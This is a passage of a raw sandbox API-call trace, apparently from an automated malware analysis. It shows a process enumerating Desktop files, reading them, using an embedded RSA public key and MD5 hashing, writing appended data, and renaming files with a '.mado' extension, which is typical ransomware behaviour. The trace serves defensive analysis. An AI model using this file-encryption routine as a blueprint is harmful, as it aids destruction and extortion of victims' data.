0x32fe5f8 [0205.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0205.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe640 | out: hHeap=0x2c0000) returned 1 [0205.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72c98 [0205.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe670 | out: hHeap=0x2c0000) returned 1 [0205.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0205.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0205.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b72ec8 [0205.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0205.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72b80 [0205.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5f8 | out: hHeap=0x2c0000) returned 1 [0205.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74e80 [0205.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c98 | out: hHeap=0x2c0000) returned 1 [0205.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66288 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3219e0 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66180 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66288 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72ec8 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe628 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe658 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe610 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5e0 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66390 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5c8 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81158 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66498 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72db0 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0205.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.029] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0x13bb4, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0x13bb4, lpOverlapped=0x0) returned 1 [0205.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0205.029] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x13bb9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.029] WriteFile (in: hFile=0x63c, lpBuffer=0x3b66078*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b66078*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66078 | out: hHeap=0x2c0000) returned 1 [0205.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74e80 [0205.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74e80, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0205.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b752b0 [0205.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.029] WriteFile (in: hFile=0x63c, lpBuffer=0x3b752b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b752b0*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0205.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b752b0 | out: hHeap=0x2c0000) returned 1 [0205.029] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.029] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.030] CloseHandle (hObject=0x63c) returned 1 [0205.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eeff8 [0205.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x3b74e80 [0205.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeff8 | out: hHeap=0x2c0000) returned 1 [0205.031] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zUdwhkJ\\7DIaYrya0lfH8Miq2Up.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zudwhkj\\7diayrya0lfh8miq2up.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zUdwhkJ\\7DIaYrya0lfH8Miq2Up.wav.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zudwhkj\\7diayrya0lfh8miq2up.wav.mado")) returned 1 [0205.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.031] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef090 | out: hHeap=0x2c0000) returned 1 [0205.032] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb75e7be0, ftCreationTime.dwHighDateTime=0x1d5dc98, ftLastAccessTime.dwLowDateTime=0x1fcb07a0, ftLastAccessTime.dwHighDateTime=0x1d5e696, ftLastWriteTime.dwLowDateTime=0x1fcb07a0, ftLastWriteTime.dwHighDateTime=0x1d5e696, nFileSizeHigh=0x0, nFileSizeLow=0x13905, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7KMqt8ZHYw9.bmp", cAlternateFileName="7KMQT8~1.BMP")) returned 1 [0205.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2ef090 [0205.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.033] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zUdwhkJ\\7KMqt8ZHYw9.bmp") returned=".bmp" [0205.033] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zUdwhkJ\\7KMqt8ZHYw9.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zudwhkj\\7kmqt8zhyw9.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.033] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=80133) returned 1 [0205.034] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.036] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x138df, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.036] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.037] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.037] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x13905, lpOverlapped=0x0) returned 1 [0205.038] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.038] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.038] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.038] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0205.039] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.039] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.039] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.039] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.039] GetLastError () returned 0x0 [0205.039] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.039] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0205.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.039] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.039] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.040] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x13910) returned 0x3b81690 [0205.040] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0205.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b81158 [0205.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5c8 [0205.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b811a0 [0205.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5e0 [0205.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe610 [0205.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe658 [0205.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe628 [0205.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b72b80 [0205.041] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b72b80, Size=0x218) returned 0x3b7c6a8 [0205.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe610 | out: hHeap=0x2c0000) returned 1 [0205.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe628 | out: hHeap=0x2c0000) returned 1 [0205.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe658 | out: hHeap=0x2c0000) returned 1 [0205.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe658 [0205.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0205.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe628 [0205.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0205.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe610 [0205.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6eb80 [0205.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6ec98 [0205.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe628 | out: hHeap=0x2c0000) returned 1 [0205.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe610 | out: hHeap=0x2c0000) returned 1 [0205.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe658 | out: hHeap=0x2c0000) returned 1 [0205.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0205.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.042] GetCurrentThreadId () returned 0x600 [0205.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75968 [0205.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b683d8 [0205.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0205.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75a70 [0205.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.042] GetCurrentThreadId () returned 0x600 [0205.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0205.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75b78 [0205.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75c80 [0205.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe658 [0205.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe610 [0205.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe628 [0205.044] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x13905, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.044] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, 